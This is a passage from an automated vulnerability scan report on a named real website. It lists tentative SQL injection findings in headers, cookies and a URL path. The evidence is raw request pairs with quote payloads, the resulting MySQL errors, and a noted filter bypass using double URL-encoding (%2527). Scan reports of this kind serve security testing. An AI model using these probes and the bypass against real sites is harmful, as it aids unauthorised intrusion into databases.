Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/59-search-ranking-position-with-ga.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:30:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:30:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:30:23 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:30:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.138. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/59-search-ranking-position-with-ga.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:24:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:24:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:24:17 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.139. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [ki_u cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/78-best-seo-video-matt-cutts-wordpress.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:27:14 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:27:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25533


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.140. http://www.analyticspros.com/blog/seo/78-best-seo-video-matt-cutts-wordpress.html [optimizelyBuckets cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/78-best-seo-video-matt-cutts-wordpress.html

Issue detail

The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:28:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:28:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:28:34 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:28:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25534


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.141. http://www.analyticspros.com/blog/urchin.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:40:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:40:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.142. http://www.analyticspros.com/blog/urchin/118-urchin-7-now-available.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/118-urchin-7-now-available.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/urchin.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:28:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/118-urchin-7-now-available.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/urchin.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:28:07 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.143. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/urchin/121-urchin-7-new-interface-first-look.html%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:37:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/121-urchin-7-new-interface-first-look.html%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:37:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:37:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:37:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.144. http://www.analyticspros.com/blog/urchin/121-urchin-7-new-interface-first-look.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/urchin/121-urchin-7-new-interface-first-look.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:26:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/urchin/121-urchin-7-new-interface-first-look.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/consulting.html
